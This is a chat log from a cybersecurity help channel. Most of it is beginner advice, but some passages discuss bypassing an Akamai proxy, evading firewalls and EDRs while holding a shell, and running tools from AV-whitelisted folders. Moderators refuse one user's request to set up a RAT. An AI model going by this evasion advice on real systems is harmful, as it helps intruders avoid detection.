#👥・help-me

1 messages · Page 10 of 1

upbeat veldt
#

I would suggest something a little more stable like Ubuntu or pop os for bare metal daily driver... And just add the tools as you need them

echo tree
#

yeah

uncut wedge
echo tree
#

i dont know, i don't like ubuntu

echo tree
upbeat veldt
#

Well a Kali VM would be the way to go

echo tree
#

i think Parrot is more stable than Kali on the main OS

uncut wedge
#

it's not stable, but it's potato-friendly

echo tree
uncut wedge
#

so it'll run better in old laptops

upbeat veldt
#

For bare metal tho could be a pain if you go to update and upgrade your Kali packages and everything breaks...

upbeat veldt
#

Chances are you won't need every single tool Kali comes pre installed with either...

echo tree
#

Yeah for sure, i dont even know some of them

upbeat veldt
#

I haven't tried parrot

echo tree
#

I've heard that parrot is better on bare metal than kali

#

I would've gone with kali

upbeat veldt
#

I use Kali VM and pop os as daily driver... Just install tools as I need them... And installed some other things like syntax highlighting, etc...

uncut wedge
#

it's simple tbh. you want speed and less lags, use parrot. you want efficiency and robustness, use kali. both use apt and have a wider support for tools. also select displayman with caution as kde can desperately reduce performance

upbeat veldt
#

I like some of the features pop os has like encrypted storage, history auto complete etc... and it's made for bare metal... Can always check out system76 laptops.... Can get up to 96 Gb ram and 12tb storage....

echo tree
upbeat veldt
versed vale
#

I no, I want to locate where I can pay for them and if you have a free one you can help me with I don’t mind

final breach
#

hey anyone have expertise in hashcat

#

its showing balck screen while i running it in windows 11

uncut wedge
upbeat veldt
#

He's probably trying to utilize the gpu and would need to be ran on host machine... You could always try john on Linux machine or an online hash cracker first... Might get lucky and hash has already been cracked... Or you could do hashcat from VM might just need to add the force flag but then you are not utilizing gpu, instead cpu which would be a little slower...

final breach
#

and without dedicated gpu its no use to run the hashcat

final breach
#

i tried all the drivers and all possible options

#

cuda and all

upbeat veldt
final breach
#

ctf offcourse

#

i just trying to decrypt some salted hashes

#

i updated my graphic card's drivers recently is the issue related to drivers

#

@upbeat veldt

uncut wedge
upbeat veldt
#

If it's for ctf then chances are it has already been cracked and could possibly find it on online.... Could try hashes.com or crackstation... Also John the ripper can crack salted hashes might be slower than hashcat but if all else fails id go with John...

final breach
final breach
upbeat veldt
#

True but as of right now you are not cracking anything....

uncut wedge
final breach
uncut wedge
final breach
uncut wedge
#

oki

#

good luck

final breach
#

Thanks

neat lily
#

Hi can anyone tell me what can I use to encrypt my voice through phone call

barren terrace
silent bay
#

any advice for starting out c++??? should I use codecademy to learn, or what is the best way to learn

silent bay
#

thanks

past wing
# silent bay thanks

no problem
there are many other resources tho
this the one i liked
and about paid courses im not pretty sure about them

neat owl
#

Is connectbot a good ssh client for Android, I've used it before it was ok, I didn't use it again after a while

lethal scarab
#

gm y'all
please is there resources or video link that'll take me from zero to hero in cyberSec.
i already have kali installed in a vm

lethal scarab
lethal scarab
#

is there anyone with a team tryhackme subscription? I'd like to join and pay.
the single one is expensive.

#

or is it possible to learn well without the premuim?

upbeat veldt
lethal scarab
#

what's HTB btw?

upbeat veldt
#

no problem, Hack The Box

#

i would suggest doing that 2nd if you are just starting out since those machines are a little harder than tryhackme

true quartz
#

anyone can suggest a secure good vpn that i can use

shadow fractal
#

I saw that this helped one person

#

Might be the case

#

Idek

lethal scarab
shadow fractal
true quartz
#

ok thank you

sturdy warren
#

I'm just learning basic html amd css, how do I make it so that a button changes color when I hover over it the same as doing cursor: pointer; makes the cutsor a hand when hovering over button?

sturdy warren
lethal scarab
#

button:hover {
background-color: green;
}

sturdy warren
#

I see

#

Thanks

lethal scarab
#

worked?

sturdy warren
lethal scarab
fast maple
#

@vestal slate yooo was up

#

@vestal slate yo brodie you here

vestal slate
vestal slate
fast maple
#

yea so what do you need help in bro tell me

lean plume
#

Goodmorning

uncut wedge
#

morning!

modest comet
#

guys anyone knows how to get ip address of an insta user?

lean plume
#

@quasi berry did u find any thing

quasi berry
wintry sigil
#

Where do I start with hacking and what programming language should I be familiar with?

shell sinew
#

solid knowledge

#

then jump into hackthebox, start with starting points then machines

#

you could check out hackthebox academy too and choose what is better for you (tryhackme or hackthebox academy)

lament walrus
#

Theoretically speaking

#

Could i buy a chinese ev

#

Jailbreak it

#

And play mario kart

#

is there like some kind of rubber ducky/OMG like thing i could use to do that?

quasi berry
#

Wdym by a Chinese EV?

maiden violet
quasi berry
#

I meant the EV part

#

Electric Vehicle?

maiden violet
quasi berry
#

You can definitely jailbreak the thingy, and play games but I don't see that running well

maiden violet
#

I don’t understand how you need a rubber ducky for it

quasi berry
#

You don't

quasi berry
#

Yeah this is the place

#

Let's get to business

#

How much do yk about Windows?

#

You're gonna need to know fundamentals of both, and Networking; For Networking you'll have to cover stuff like TCP/IP and OSI model

#

Windows is used a lot on servers and stuff. For now you can learn fundamentals and stuff, then eventually you can learn NTLM, Kerberos, etc

#

We have a #1181325692823150642 channel where I have put a ton of resources. HackTheBox Academy, and Tryhackme are 2 of the top recommendations; do you have any specific VARK learning style?

#

This is what VARK is; and if you're neurodivergent (like myself) then you may benefit from a more gamified platform

#

Yeah so if there is any which you feel fits you, lemme know so I can fetch you some learning resources which will hopefully be receptive for you

#

So hands on stuff

#

You can also @ me

#

I know I have the mod role, I also have the mentor role because this is my thing :)

#

I'd say start with following A+

#

There are plenty of resources pinned in #1181325692823150642 so feel free to check those out too. When you get onto looking into Windows and Linux then you can install VMWare eSXI, Parallels or UTM which are virtualisation software for Mac, it'll allow you to setup VM's so that you can setup networks and stuff.

Typically pentesters will use a Linux based OS (Parrot / Kali) for pentesting, so you could setup a Linux distro as your attacker machine, and setup Windows machines on a VLAN which will include the Active Directory, Domain Controller, and then the Clients.

Don't jump straight into doing that with virtual machines unless you're at that part so you're able to follow the video or whatever it is that you're using

#

And if you have any questions, or would like me to personally go over setting stuff up like that with you then let me know

#

Yup

#

It wouldn't hurt to set it up, though it will come up later on :)

#

Typically you can find cheat sheets for tools, and if you can't then use man pages, -h, or --help on the command; any decently programmed tool will have a help menu

#

And if it doesn't? It's a shit tool 🙏

#

Sometimes @mortal phoenix comes into the chat so if there's smth Windows related that I don't have the answer to, he will know. He's currently at the defcon hotel rn so his interactions here will be limited

quasi berry
#

My bad Mimi

uncut wedge
quasi berry
quasi berry
maiden violet
idle wraith
#

Good morning professions,
Please I need resources to prepare for CISA exam.
I will be glad if I can get any useful resources to help me prepare better

quasi berry
#

Which CISA exam is it?

chilly merlin
#

I see a goat typing

mortal phoenix
#

You’ll definitely want to know Windows and Linux as you get deeper into this. Those are predominantly the two main systems used in the world. Linux for servers (some of us use it for desktops but not so much in enterprise), windows for desktops and servers. Active Directory is still huge in Windows even though businesses are shifting more to Intune/Azure for a more serverless solution called DaaS (Directory as a Service).

You’ll definitely want to understand IAM (Identity and Access Management) concepts with AD e.g. Kerberos. But also LDAP and maybe eventually OIDC, Oauth, and SAML.

Like @quasi berry said I’m at Hacker Summer camp this week currently at B sides, then will be at DEFCON at least until Sunday

chilly merlin
#

Goat is still typing

mortal phoenix
#

Mac will, IMHO be a hindrance and limitation in the long term when learning a lot of these things. It can get you started @chilly merlin but there’s a reason I ditched my own Mac about a decade ago

mortal phoenix
# gloomy arch do u prefer parrot OS?

For laptop to have bare metal offensively security Linux installed without too much tweaking, yes. When I get home I may play with Black Arch though as I hear good things. Kali is better IMHO as a VM or flash drive

quasi berry
mortal phoenix
gloomy arch
mortal phoenix
quasi berry
#

I couldn't agree more with Pop!_OS tbh

#

It's great for gaming, and if you have a nvidia graphics card then you can choose the download which has the driver pre-installed though it is not difficult to install the driver yourself via the store or cli

mortal phoenix
quasi berry
gloomy arch
#

yall are nvidia users?

mortal phoenix
quasi berry
gloomy arch
#

Absolute crazy

#

im an intel user

mortal phoenix
quasi berry
mortal phoenix
#

3050 in my windows enterprise stream box

gloomy arch
#

Actually

#

No

#

Ultra HD

mortal phoenix
gloomy arch
#

on my gaming pc, its just a radeon rx 6600

quasi berry
#

The menu name escapes me 🤣

gloomy arch
mortal phoenix
quasi berry
quasi berry
mortal phoenix
#

Yeah I’m all in for AMD right now until RISC-V gets there then fuck x86 as a whole and fuck ARM too

gloomy arch
#

nvidia make some decent graphic cards, yet they cant make a decent graphical menu

mortal phoenix
quasi berry
gloomy arch
mortal phoenix
quasi berry
#

Fair enough; if they somehow surprise us in less than that I will be gob smacked

rigid panther
#

I didn't want to put payment method

rigid panther
cerulean stump
#

Is there a way to find out which number is behind a private number?

lament walrus
#

Anyone have any tips on how to treat RSI from repetitive m and k use?

#

I've been typing too much 😭

uncut wedge
#

what's rsi

edgy breach
#

hihi! i was doing some tests in a website and in both my nmap results and nessus scans results, i stumbled upon an akamaighost server (and i imagine that its a proxy to protect the original target)... is there a way to bypass it?

tepid pivot
#

Hi guys I need help can anybody help me with internships like where can I apply I am looking for an entry level job but I am not getting anywhere , please help

uncut wedge
uncut wedge
shell sinew
uncut wedge
tepid pivot
shell sinew
#

try just googing <position> <your_citty>

uncut wedge
shadow fractal
uncut wedge
shadow fractal
#

Thank you @uncut wedge and @shell sinew

tepid pivot
#

And I am a fresher so yk it’s so tough idk I am just so tired of getting that mails unfortunately

edgy breach
shadow fractal
#

You did a scan

#

You found something

#

Thats why we refer to rules and from this side it is unethical

#

If you have the proof

#

For the vdp

edgy breach
#

oh wait

shadow fractal
#

Then someone might assist you

#

Other then that

#

Sorry

uncut wedge
# tepid pivot I am a diploma graduated as a computer programmer in IOT as specialization

make as many connections as possible. attend meetups, conferences etc, socialize with people, write them mails or connect in linkedin and develop a bond. they can directly have you qualified for interviews. also you can directly apply to companies using their portal without linkedin or indeed. also connect to professionals in iot applications and talk to them. doesn't matter if they don't respond

#

sometimes it can take time but you'll get positive results 🙂

edgy breach
uncut wedge
#

ohhh you're doing a bug hunt

edgy breach
uncut wedge
tepid pivot
uncut wedge
# edgy breach hihi! i was doing some tests in a website and in both my nmap results and nessus...

general rule is you don't do nmap scans on a live target 🙂 nessus is oki because it's less noisy. you can do a stealth scan in nmap but it will still trigger alarms. i can't straightaway tell you how to bypass it but do more recon on the proxy. it will 100% be using whitelisting rules and cookie policies. you can use postman to try to manipulate cookies. also i have seen akamai servers use websockets to communicate with the assets so if you figure out what websockets protocol scope is using, you can try looking up bypass tck. also don't forget to tweak with api if in scope

#

normally apis have direct access to certain resources without proper csp

edgy breach
#

okay! ill do more research on the proxy, and thanks for the advice with nmap! (and sorry about earlier 😭 ill try to be more specific next time)

edgy breach
#

sankyuu!!

lament walrus
#

aka my pinky finger hurty cuz mouse :(

uncut wedge
#

ohhh

#

don't know anything about it, i'm sorryy 😦

edgy breach
lament walrus
#

Like a cream/lotion?

edgy breach
lament walrus
#

ohhhh

#

Ibuprofen and ice

#

😭

#

Ty

edgy breach
#

its tiring to do every time

#

but it helps the pain to go away

dark wadi
#

Can a person become self taught hacker

#

??

chilly merlin
boreal solstice
dark wadi
#

What are some good learning resources to become a self taught hacker?

dark wadi
chilly merlin
dark wadi
#

Thanks brother 🫂

uncut wedge
quasi berry
quasi berry
chilly merlin
#

can i get help on how to go about on this. Text4shell & CVE-2023-22809. I don't know where i can even start from

dawn pilot
#

Can I get help on finding my school acc password I forgot it

quasi berry
dawn pilot
#

who is it support

uncut wedge
shell sinew
shell sinew
#

@shadow fractal @quasi berry

hybrid gulch
#

I will pay good money to get work done...

shell sinew
knotty ridge
#

@quasi berry dm me

quasi berry
knotty ridge
#

Wanted to know what kind of work you wanted it done, sorry if I offended you.

uncut wedge
shell sinew
quasi berry
quasi berry
quasi berry
uncut wedge
quasi berry
uncut wedge
shell sinew
#

anyone here knows how to use SAP Logon?

#

need help with creating user, roles etc.

chilly merlin
#

Hi

urban zephyr
#

Hey everyone, I don’t speak English well so sorry in advance. And I’d to know if someone knows how can I recover my instagram account. I don’t have the password anymore neither the mail which is linked to it. Can I get some help..?

#

And also is there anyway to download all TikToks from an banned account or not ?

quasi berry
urban zephyr
#

Alright I’ll see that thanks ✨

shadow fractal
#

No self promoting

shell sinew
sinful marsh
#

I need to hack a scammer

chilly merlin
chilly merlin
#

what are evasion techniques for firewalls when establishing a shell instance ; so far I know encrypted connection, fragmentations, and packet manipulation and im wondering if there are other techniques used to reduce the amount of noise created to evade SOC Analysts

uncut wedge
#

umm

#

then you have polymorphic shellcodes

#

that tweak themselves with each execution to avoid heuristic detection

chilly merlin
#

im not worried abt that i can stay hidden from AV and EDRs im just confused abt network traffic

uncut wedge
#

if i was you i'll worry about edrs more than i'll worry about network persistence. you can persist the connection with encapsulation on a specific port that the domain is not too concerned about. you will be needed to do some trial-n-error with the waf to figure out which endpoints are whitelisted

#

the main problem is how you will counter the edr

#

edrs are notorious for killing connections with shells that run in memory

chilly merlin
#

there are myriads of techniques to evade EDRs (which i am familiar)

#

after seeing what you said im pretty sure in my case its that im more familiar w EDRs than firewalls

uncut wedge
chilly merlin
#

wait

#

nvm

uncut wedge
#

in most cases you won't be privileged enough to unhook a process or issue a syscall because you'll be sandboxed in a powershell session. in such cases escaping the box is possible by updating registry keys which bridge between an unauthorized session and syscalls. you need to figure out which registries/privs allow that to happen. i'm pretty sure that, or certain directories are whitelisted which bridge between both realms

chilly merlin
#

what i mean is the way EDRs monitor ur program is by injecting a dll and hooking API calls so what you would do is either override that dll so it would terminate process or u manually call the functions via inline ASM and jumping to syscall to ntdll after setting up registers to call winAPI functions without having it hooked

uncut wedge
# chilly merlin what i mean is the way EDRs monitor ur program is by injecting a dll and hooking...

yess, but it will have many challenges as well the first one being the detection of dll tampering. the edr can simply detect the tampering and kill the tampering process instantly eliminating your shell. another problem is inline asm like you mentioned. if you make any human error in calling out the functions it can trigger alarms. also nowadays edrs come with insane behavioral analysis models which instantly catch malicious syscall usage and quarantine the suspected process

also edrs such as sentinelone now offer kernel-mode hooking, which makes it close to impossible to bypass their monitoring based on user-mode evasion techniques. there are some methods to counter this but I can't disclose them

chilly merlin
#

put in the hours to reduce the errors

uncut wedge
#

truee 🙂 it all depends on trial-n-error

chilly merlin
#

or almost nothing

#

cant beat ring 0 detection being above it 😔

uncut wedge
#

yess. people generally undervalue what edrs are capable of and that's oki. the average av is faaaaaaaar more simpler in logic and function than an enterprise endpoint security solution

modest hazel
#

Hi @uncut wedge

quasi berry
tame spruce
#

I'm trying to run the wifite and i had to go get a WIFI adaptor i got (Nighthawk® AXE3000 WIFI 6E USB 3.0 Adapter) and it should be compatible with kali but it doesn't show that

heady brook
#

Need help to crack this, taking ages (probably need a good word list) $2y$10$kQ0KEj2apt2rMAGX15FC8.o6AX7CtUGtfG2isOkB6DSuufq/OTYNu - Possible algorithms: bcrypt $2*$, Blowfish (Unix), bcrypt(md5($plaintext))

#

I'll highly appreciate

quasi berry
quasi berry
#

You don't need to be a mod to help ❤️

#

😭

uncut wedge
uncut wedge
#

also make sure the hash isn't salted

quasi berry
#

Thank you for keeping me updated; how are you finding it? :)

quasi berry
#

That's wonderful

urban zephyr
#

Hi everyone, I saw srhoe on instagram saying that he found a way to watch a private instagram story, y’all have an idea of how to doin it or not ?

quasi berry
#

Watch it privately* not watching the story of a private account

modest hazel
uncut wedge
chrome totem
#

heyy i want learn how to hack my friends passwords

uncut wedge
#

kim jong un has friends? hehe

#

and don't do it without their approval. bad bad

sly spire
sly spire
uncut wedge
sly spire
#

Nice 🔥

modest hazel
uncut wedge
#

thank youu 💜

modest hazel
modest hazel
uncut wedge
#

working in a forbes 500

modest hazel
modest hazel
uncut wedge
modest hazel
uncut wedge
sly spire
modest hazel
modest hazel
uncut wedge
sly spire
modest hazel
uncut wedge
modest hazel
#

You in Cyber security?

sly spire
#

me?

modest hazel
sly spire
modest hazel
uncut wedge
#

🙂

sly spire
sly spire
#

and third year cs student

uncut wedge
#

my parents couldn't afford my uni that was the main reason

modest hazel
sly spire
#

dabble?

sly spire
modest hazel
sly spire
#

but it turns out to be great

modest hazel
uncut wedge
sly spire
sly spire
uncut wedge
modest hazel
modest hazel
modest hazel
#

At this stage.. you could be an admin here...

uncut wedge
sly spire
uncut wedge
modest hazel
#

Same... I sleep by 5am most times...

sly spire
#

when i was starting i found like a couple of bugs but they where duplicates and till now nothing

modest hazel
#

They undoubtedly are..

#

Good luck will come your way dude

uncut wedge
uncut wedge
sly spire
modest hazel
uncut wedge
modest hazel
modest hazel
sly spire
#

i've been studying non stop for the past 3 months

#

and trying to find bugs and solving labs....

uncut wedge
uncut wedge
#

i believe in you 🙂

modest hazel
modest hazel
uncut wedge
modest hazel
modest hazel
uncut wedge
modest hazel
#

Whoa.... I'm kinda an introvert so everything seems strange..

modest hazel
uncut wedge
#

procmon is all about analyzing registry access patterns, network connections and communications and process activities. apimon is mostly winapi behavior analysis, debugging applications etc

dawn mirage
#

Heavenso. I’m brand new and don’t know much at all about coding nor programming even though I’m pretty resourceful and know how to use a computer well. I need to learn the basics and don’t know what’s the best coding language to start with?

Also, I got a free trial for spotify and tradelle and want to try dropshipping. I’m struggling really hard with what I’m doing though and don’t want to give up. It was 7 days free trail and I have 2 days left. I want help getting that working and test it out while I still can :/

If anyone is willing to help me please lmk! I need help!

dawn mirage
#

Thank you! I’ll look into learning Python for the first coding language to learn. Where can I start learning that?

upbeat veldt
thorn kettle
#

I need help

dawn mirage
sly spire
uncut wedge
#

you're welcomee 💜

quasi berry
#

Double checking

#

Oh nvm

#

If you don’t quite identify as an introvert or extrovert, you may be an ambivert.

#

Has nothing to do with what I mentioned 😭

#

What I described is Synesthesia

uncut wedge
#

also @wooden anvil hiiii hope you're okayy 💜

vapid dew
#

is anyone use tryhackme now?

modest hazel
quasi berry
modest hazel
quasi berry
uncut wedge
modest hazel
modest hazel
quasi berry
#

She's my pooks ❤️

uncut wedge
quasi berry
sly spire
quasi berry
#

Now you have

uncut wedge
quasi berry
# uncut wedge amazingg i'll be happy for her too

I'll also get my CISSP someday, I'm just so proud of my pooks, she's going far and it endears me that she's so determined in figuring stuff out herself; though if she gets stuck stuck and it's not a "google" solvable problem, I am sure she'll come to me. She heals me.. 🥹

uncut wedge
quasi berry
uncut wedge
#

tysmm 💜

chilly merlin
quasi berry
quasi berry
chilly merlin
quasi berry
#

What are you on abt

#

Yeah Mimi had a breakup with their now ex; I'm confused what you're questioning

chilly merlin
#

Mimi thingy

#

I wonder how u found out

#

Nvm

#

Not gonna get into details

#

I know that feeling

quasi berry
#

Because it was discussed by Mimi

uncut wedge
chilly merlin
quasi berry
chilly merlin
#

We will listen love failure songs together

#

Currently listening one

#

Please how do I setup this tryhackme so I can do it on my laptop

chilly merlin
#

It says I have to use openvpn

#

I don’t know how to set it up

chilly merlin
#

Its easy

#

Find a YouTube video

#

Or else ping me

#

Alright

#

Thank you

#

Hi Eveyrone,

This is one of the first videos on this channel related to TryHackMe plateform. If you want to connect to TryHackMe labs using your VPN on Kali Linux OS, use this video as a tutorial.

If you want to join the sessions live, feel free to join below Telegram group :

https://t.me/+q3NdEnx0DQc3NWQ1

Don't forget to like & comment fo...

▶ Play video
#

If u still having a hard time

chilly merlin
#

Happy hacking i say

#

Trap is here

#

To say something

upbeat veldt
# chilly merlin Thank you <@456226577798135808>

Also id suggest downloading and using us-west-1 config for OpenVPN as it seems to have the most success rate... I know a bunch of other users were having issues trying to connect to THM network...

chilly merlin
chilly merlin
uncut wedge
uncut wedge
obsidian umbra
#

wsg guys

undone compass
#

Hi guys I'm new to all hacking can some one give directions how to start my journey?

upbeat veldt
undone compass
upbeat veldt
lament walrus
#

anyone have a good note taking/ schedule planning app?

#

Preferably on android

shadow fractal
#

Obsidian is nice tbh

#

Sadly I am not too keen on using it

#

I am that person who keeps everything in my head

#

A more simple explanation kekWut

#

Ech, idk why, but if things are hardwr to accomplish I like it more

#

Weird thing

#

Notes would help me a lot

#

But I just can’t get myself to do them

#

Idk why or how

#

But maybe sometime

#

Other then that, back to original topic, most of peeps I know use Obisidian

#

And the responses are quite good

#

Not perfect ofc

#

As per everywhere, there could be better things

valid moth
#

How did you guys manage to memorize the abundant terms and acronyms? Ive always struggled with termonolgy and rout memorization.

#

Its not entirley impossible for me to do of course. But some I do want to learn a few habits to make this a skill I can utilize.

#

Mmm Ill have the repetition down by nature of the task. But Mnemonics and contexual learning are something Ill look into.

#

Thanks ;3

timid cargo
#

does anyone know some good university to study a MSc in cybersecurity in EU? much appreciated in advance

timid cargo
#

union preferably

#

thanks for the responses <3

fathom cosmos
#

Anyone has any experience creating an instagram bot?

quasi berry
maiden violet
tame spruce
#

I need help with my wifite tool (ModuleNotFoundError: No module named 'wifite.wifite')

maiden flare
#

Hey guys
I am using a windows laptop for starting cybersecurity
do i need to use linux itself like dual booting or use virtual box or can i just do everything in windows itself
(i am doing CTFs and bugbounty , HTB and TryHackMe)

chilly merlin
# tame spruce I need help with my wifite tool (ModuleNotFoundError: No module named 'wifite.wi...

Troubleshooting and fixing issues with Wifi (specifically Wifite) on Kali Linux.
Need help? Join my Discord: https://discord.com/invite/usKSyzb
Commands:
hcxdumptool:
sudo apt install hcxdumptool

hcxpcaptool:
apt install hcxtools

pyrit:
sudo apt-get install libpcap-dev
sudo apt-get install python2.7-dev libssl-dev zlib1g-dev libpcap-dev
git c...

▶ Play video
chilly merlin
#

Many tool available in kali

#

But u can use wsl

#

Or vm

maiden flare
#

so I should use Kali as it has many tools already (VM) which are not available in windows?

chilly merlin
#

I prefer vm cuz it keeps shit seperate

maiden flare
#

ohh ok ok like that tx so much

chilly merlin
#

Xddd

tame spruce
chilly merlin
#

Delete and reinstall

sour badger
sour badger
tame spruce
sour badger
#

I hate window everything

quasi berry
sour badger
#

I’m on the fence abt arch

#

Idk yet

#

Not bc the install

#

Just bc I looked at so many others

#

Like I may do qubes

#

Or the kodachi

#

Or tails

quasi berry
quasi berry
sour badger
quasi berry
#

Yeah it's one of them which I like

sour badger
#

Ok I’ll start there

obsidian umbra
#

is it me or byob don't work?

dreamy vine
quasi berry
lament walrus
#

Yo ben

lament walrus
#

I need a lil help

#

Tryna create a simple tensor cipher

maiden violet
quasi berry
maiden violet
#

I want to meet developer of SrhoeOS tho

lament walrus
#

Do you have any ideas on how i can get it to work in python?

maiden violet
#

Just figure out how the cipher works

#

And then make it in code

#

You would need to use numpy

quasi berry
#

@lament walrus You said my name

#

I will develop the OS

maiden violet
maiden violet
#

Wait mimi likes windows?

maiden violet
lament walrus
chilly merlin
#

@uncut wedge

uncut wedge
uncut wedge
chilly merlin
#

My quest was completed

maiden violet
uncut wedge
#

i'm oki thank youu 🙂 wby

uncut wedge
chilly merlin
uncut wedge
chilly merlin
#

And badminton

maiden violet
chilly merlin
#

And company placement

uncut wedge
#

toooo much

uncut wedge
maiden violet
uncut wedge
maiden violet
chilly merlin
#

But dad insists

maiden violet
chilly merlin
#

U know how market is in here

maiden violet
chilly merlin
#

No skill though

#

Jus trash

#

That's where i capitalise

lament walrus
#

Anyone know anything about gym plans 😭

#

Is this good 😭

#

Saturday - shoulders + forearms
Sunday - back + core + trapeze
Monday - legs + core
Wednesday - chest + forearms
Thursday - bicep + triceps

maiden violet
#

I heard at my friend’s uni people were hired at Apple who knew nadda

chilly merlin
#

Good workers in their opinion

maiden violet
#

My friend is Indian

chilly merlin
#

They are in big college that's it

#

No skill whatsoever

#

Companies will realise eventually

maiden violet
#

Some of em had no GitHub

#

Either they were some sort of DEI quota hire

chilly merlin
maiden violet
#

Or they had connections

chilly merlin
#

I need to crawl my way up

#

Tough competition

maiden violet
#

I hate the quota hires ngl

chilly merlin
#

U mean management

maiden violet
#

No?

chilly merlin
maiden violet
chilly merlin
#

Any ways I'll try my best

tame spruce
tame spruce
tame spruce
chilly merlin
maiden violet
frail prism
#

hi i need help with cracking pdf file, why? i got wrong password and can't ask for correct one I wrote but they don't reply to my messages

tame spruce
frail prism
#

i tried but no asnwers at all

chilly merlin
#

?

#

Does the job right

#

If i recall correctly

upbeat veldt
chilly merlin
frail prism
#

nvm

tame spruce
chilly merlin
tame spruce
#

not sure what's that but i searched it in git hub if that's what you mean

chilly merlin
#

Something must be wrong in wifi or in monitur mode

tame spruce
chilly merlin
#

Hmm

#

Better to use other tool then

#

Since Dev are unable to solve

#

Or use lower version

tame spruce
# chilly merlin Better to use other tool then

that's what i'm thinking about but getting too late and i have to communicate with my professor and get approve for it and kind of presenting on Wednesday i will try the lower version before i give up

tame spruce
chilly merlin
#

Ngl i didn't do shit

#

Jus yapped

#

Yappa yappa yappa

tame spruce
#

lol

#

you did what you can

lament walrus
#

anyone want to test the ctf i made?

#

its crypto :D

#

let me know if its too simple

#

because i can turn up the complexity

#

dm me if interested

#

(may respond a bit late)

uncut wedge
#

can you expand your question please 🙂

#

didn't fully understand what you mean

#

lolll

uncut wedge
#

i can't really suggest any tools or methods without checking the environment first. if it's a commercial pentest you need to simulate the attack first before doing anything crazy like running linpeas 🙂 these scripts and tools often hammer a lot of different areas within the system and that's instant death if the target has a av/soar

if it's an ad, you can use bloodhound for the relationship tree first. bh is pretty stealthy so you can try running it in production

halcyon galleon
#

Hello

wooden anvil
#

i appreciate you

#

yall

chilly merlin
#

bring your own drivers and exploit them

chilly merlin
#

hmm not rlly i just pull one randomly and start working around it

lusty latch
#

i need to hack something

#

help me

#

please

boreal solstice
chilly merlin
#

If it is

shell sinew
quasi berry
chilly merlin
drowsy bronze
#

hello

#

i need help

#

please

#

im begging

boreal solstice
drowsy bronze
#

it wont let me upload images

boreal solstice
drowsy bronze
#

okay

#

so

#

i need help

#

i have an rdp server

boreal solstice
#

Remote desktop protocol?

drowsy bronze
#

i need help setting up

#

this builder

#

here are my settings for the builder

boreal solstice
#

Mmm chat a lil more so you level up

drowsy bronze
boreal solstice
#

Dont spam

drowsy bronze
#

ty

#

im sorry

boreal solstice
#

Tell me how was you night

drowsy bronze
#

pretty good

#

its 1:46 rn

#

am

#

but thats normal

boreal solstice
#

You still up?

drowsy bronze
#

my school starts in 2 days

boreal solstice
#

Lol

drowsy bronze
#

yes

#

ofc

#

im a freshman

#

in 2 days

boreal solstice
#

Nice

drowsy bronze
#

ive been studying for pre-sat

#

no

#

im the one talking

#

bc

#

im the one that needs leveling up

#

so

#

how much

#

do i have to level up

#

in order to

#

get help

#

from u guys

boreal solstice
#

Send an image yes

drowsy bronze
#

huhh

boreal solstice
#

Dont spam try put the words together ok?

drowsy bronze
#

okay i understand

#

but wont that be slower to level up

#

what level is image perms

boreal solstice
#

Not really you should level up any minute now

drowsy bronze
#

lets goo

boreal solstice
#

Ok now send imgur

#

So its embeded

boreal solstice
#

What are you trying to do

drowsy bronze
#

setup a rat

boreal solstice
#

…. Is this unethical

drowsy bronze
#

wait

#

look at my roles bro

#

i mean

#

😭

boreal solstice
#

Set up a rat we cant help you do that have you read the #📜・rules

drowsy bronze
#

dude

#

what the flip

#

do u even accept black hat hackers

#

in here or would i just get a ban for that

boreal solstice
#

Not here we dont do unethical stuff here

#

Even blackhat follows the rules

drowsy bronze
#

u urself are labeled as black hat hacking

#

oh noo

#

its just

#

to test stuff

#

i am actually testing their program

#

its ethical

drowsy bronze
#

yes i am just testing the code

#

that is my job

#

i test code

#

wellll

#

okay what flip theres the doxbin emoji

#

but

#

dw

boreal solstice
#

Its unethical we cant do that here

drowsy bronze
#

its ethical

drowsy bronze
#

okay

#

wtv

boreal solstice
#

?

drowsy bronze
#

u guys have a good day then

boreal solstice
#

Jeez

drowsy bronze
#

👀

#

yes sir

#

o7?

quasi berry
drowsy bronze
boreal solstice
drowsy bronze
#

okay first

#

theres a black hat role

#

second

#

theres a doxbin icon emoji

boreal solstice
drowsy bronze
#

this is so

quasi berry
drowsy bronze
#

white hack

drowsy bronze
#

in the description of black hat role

quasi berry
#

We don't help with anything black hat

drowsy bronze
#

it says

#

"you are unethical and dont womsething something idrk"

#

whatever

quasi berry
#

People can join and use the role, doesn't mean they can come and ask for help setting up a C2 and ratting a bunch of people's IoT devices

boreal solstice
#

.. i just said they can use the role but follow the rules

drowsy bronze
#

okay we split profit 50/50?

boreal solstice
#

No

drowsy bronze
#

jkjkjkjk

boreal solstice
#

…..

drowsy bronze
#

okay ima go

#

goodbye

#

wait dont ban me though

#

this is a good server

#

ill bump this server

#

and follow the rules

boreal solstice
#

Go for it!

drowsy bronze
boreal solstice
#

Have to wait a minute the bumps is every two hours u got 1hr left to bump it

#

Dont 😭

quasi berry
quasi berry
drowsy bronze
#

i mean

#

i respect the rules

#

i learned from my mistakes

#

so

quasi berry
#

Thank you

drowsy bronze
#

lets forgive and forget

#

and leave this in the past

quasi berry
#

You're good :)

#

Dw

boreal solstice
uncut wedge
#

even for running bh, you need to disable the av in most cases because it's still an executable and antiviruses don't like it. they either will remove the executable or block the execution. you can try running it in \users\public or %TEMP% as those two are sometimes whitelisted

dreamy vine
#

Who here does app developing for pc? ?

uncut wedge
#

again, depends on the av that's there. bitdefender and norton are notorious for catching malicious processes running in memory. i think now many avs do it, you'll need to look for whitelisted dirs nonetheless

#

also don't forget to check privileges of the foothold you are in

#

privileges like seimpersonate can be exploited if certain conditions are met

dreamy vine
#

Need a app developer

maiden violet
dreamy vine
#

U didn’t

#

I didn’t

lament walrus
#

Anyone willing to play test my ctf?

#

its the first ever CTF I've made :D

#

Its crypto

#

And very phun

dreamy vine
#

What’s CTF

lament walrus
#

its a challenge

#

It stands for capture the flag

#

For crypto ctfs the flag is encrypted

#

You need to decrypt it and get the flag

#

Like a game

#

I made one and need some people to try to solve it

tame spruce
#

Can i run wifite with this one i have been trying for days and kinda running out of time should order a different one or which one would you recommend I JUST WANT TO GET IT DONE.

chilly merlin
#

Hmm

tame spruce
#

it support monitor mode but not sure about packet injection

chilly merlin
#

I use tp link

tame spruce
halcyon galleon
#

I need tutorial on python

lusty latch
quasi berry
lusty latch
#

from the board

quasi berry
#

What board?

lusty latch
quasi berry
lusty latch
#

i will tell you everything there

#

pls help me

quasi berry
lusty latch
#

i dmed you

#

??

lament walrus
visual vortex
#

thats probably the best one

tame spruce
#

